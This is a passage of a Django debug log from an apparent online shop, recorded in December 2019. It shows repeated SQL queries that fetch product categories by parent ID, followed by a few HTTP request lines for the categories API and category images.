"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:24:17,154 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:24:17,157 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:24:17,159 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 10:24:17,162 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:24:17,164 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 10:24:17,167 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:24:17,169 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:24:17,171 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:24:17,175 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:24:17,177 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:24:17,179 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:24:17,182 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:24:17,184 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:24:17,186 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:24:17,189 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:24:17,192 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:24:17,194 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:24:17,196 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:24:17,198 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:24:17,202 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:24:17,204 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:24:17,206 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:24:17,208 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:24:17,210 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:24:17,214 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:24:17,216 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:24:17,218 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:24:17,220 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:24:17,223 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:24:17,225 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:24:17,228 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:24:17,230 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:24:17,232 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:24:17,235 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:24:17,237 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:24:17] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 10:24:17] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 10:24:17] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 10:24:22] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 10:26:09,449 utils 4252 140031482124032 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:26:09,460 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:26:09,467 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:26:09,471 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:26:09,477 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:26:09,481 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 10:26:09,485 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:26:09,489 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:26:09,493 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:26:09,499 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:26:09,504 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:26:09,507 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:26:09,512 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:26:09,516 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 10:26:09,522 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:26:09,526 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 10:26:09,530 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:26:09,533 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:26:09,537 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:26:09,544 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:26:09,548 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:26:09,552 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:26:09,556 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:26:09,561 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:26:09,566 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:26:09,572 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:26:09,575 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:26:09,579 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:26:09,585 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:26:09,591 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:26:09,598 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:26:09,602 utils 4252 140031482124032 (0.001) 